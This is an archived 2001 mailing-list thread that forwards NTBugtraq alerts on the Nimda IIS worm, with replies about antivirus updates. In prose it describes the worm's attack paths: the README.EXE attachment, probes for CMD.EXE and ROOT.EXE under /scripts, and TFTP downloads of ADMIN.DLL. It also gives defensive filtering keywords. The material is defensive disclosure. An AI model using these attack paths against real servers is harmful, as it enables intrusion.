Re: [imail] OT: Alert: New IIS Worm

Tue, 18 Sep 2001 10:55:39 -0700 

Correction:  Kaspersky has it in the latest daily update.

----- Original Message ----- 
From: "Jerry Murdock" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 2:15 PM
Subject: Re: [imail] OT: Alert: New IIS Worm


> Norman and F-Prot "appear" to be first from my checks.  McAfee just updated
> their site - _BUT NOTE_  you have to get the extra.dat for this specific
> virus.  A normal update will not get it.
> 
> Norton, Kaspersky and Trend aresilent on the subject.
> 
> Jerry
> 
> ----- Original Message -----
> From: "Jasmine" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:07 PM
> Subject: Re: [imail] OT: Alert: New IIS Worm
> 
> 
> > what about the rest of us who aren't using f-prot
> >
> > From:           "Jerry Murdock" <[EMAIL PROTECTED]>
> > To:             <[EMAIL PROTECTED]>
> > Date sent:      Tue, 18 Sep 2001 13:55:59 -0400
> > Subject:        Re: [imail] OT: Alert: New IIS Worm
> > Send reply to:  [EMAIL PROTECTED]
> >
> > FYI:
> >
> > F-Prot users.  The update for this was just released.  Get the new
> fp-def.zip.
> >
> > Jerry
> >
> > ----- Original Message -----
> > From: "Terrence Koeman" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 12:42 PM
> > Subject: [imail] OT: Alert: New IIS Worm
> >
> >
> > > Offtopic
> > >
> > > >From NTBUGTRAQ:
> > >
> > > ------------------------
> > > There have been numerous reports of IIS attacks being generated by
> > > machines over a broad range of IP addresses. These "infected"
> > > machines are using a wide variety of attacks which attempt to exploit
> > > already known and patched vulnerabilities against IIS.
> > >
> > > It appears that the attacks can come both from email and from the
> > > network.
> > >
> > > A new worm, being called w32.nimda.amm, is being sent around. The
> > > attachment is called README.EXE and comes as a MIME-type of
> > > "audio/x-wav" together with some html parts. There appears to be no
> > > text in this message when it is displayed by Outlook when in
> > > Auto-Preview mode (always a good indication there's something not
> > > quite right with an email.)
> > >
> > > The network attacks against IIS boxes are a wide variety of attacks.
> > > Amongst them appear to be several attacks that assume the machine is
> > > compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> > > /msadc directory, as well as an attempt to use the /c and /d virtual
> > > roots to get to CMD.EXE). Further, it attempts to exploit numerous
> > > other known IIS vulnerabilities.
> > >
> > > One thing to note is the attempt to execute TFTP.EXE to download a
> > > file called ADMIN.DLL from (presumably) some previously compromised
> > > box.
> > >
> > > Anyone who discovers a compromised machine (a machine with ADMIN.DLL
> > > in the /scripts directory), please forward me a copy of that .dll
> > > ASAP.
> > >
> > > Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
> > > the following;
> > >
> > > edit %systemroot/system32/drivers/etc/services.
> > >
> > > change the line;
> > >
> > > tftp 69/udp
> > >
> > > to;
> > >
> > > tftp 0/udp
> > >
> > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by
> > > Windows File Protection so can't be removed.
> > >
> > > More information as it arises.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > > Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now thanks!
> > >
> > > Analysis is still on-going to determine precisely what the infecting
> > > files do (there are potentially two, ADMIN.DLL and README.EXE).
> > >
> > > Some people have said their boxes seem unstable. It could be because
> > > of numerous copies of TFTP.EXE in memory. At this point it might be
> > > best to disconnect any computer that appears unstable from the
> > > network, until such time as sufficient analysis has been performed to
> > > advise how best to bring the box back on-line.
> > >
> > > It is also possible for client machines to perform the attacks that
> > > we're seeing, if you have a way to filter outbound HTTP requests you
> > > should look for anything that contains "/scripts" or "tftp" in the
> > > URL and treat as suspicious.
> > >
> > > The internal threat by this one is no different (and maybe worse)
> > > than CRII. We've seen indications of WnetEnumResource calls as well
> > > as references to IPC$. There may be NetBIOS share activity associated
> > > with the worm, and if so, it will likely spread rapidly internally.
> > >
> > > More than likely you will see the biggest effect in terms of a DoS
> > > (from many source machines). This thing cares not whether you're an
> > > IIS box or not, it tries regardless. As this spreads the effects may
> > > become more severe (no, I'm not going to provide a quote on how
> > > severe). Make sure you're inbound (and preferably your outbound)
> > > router rules are restricted to only those protocols that must be
> > > present, and ideally to machine IP addresses that should have access.
> > >
> > > More as it becomes available.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > > Numerous people have reported that on IIS servers infected with
> > > w32.nimda.amm, when visitors browse to their website the visitor is
> > > offered up README.EML, which in turn downloads README.EXE to the
> > > visitor.
> > >
> > > Please, check your IIS boxes now to see if you are infected. I've had
> > > reports of IIS servers with more than 10,000 .eml files present
> > > (mostly as a result of nimda).
> > >
> > > While we don't have any conclusive disinfecting procedures yet, any
> > > IIS box that has been infected definitely shouldn't be available to
> > > clients until we do.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > >
> > >
> > > --
> > > Regards,
> > >
> > > Terrence Koeman
> > >
> > > Technical Director/Administrator
> > > MediaMonks B.V. (www.mediamonks.nl)
> > >
> > > Please quote all replies in correspondence.
> >
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
> 
> 
> 
> 
> 
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists





______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists

Reply via email to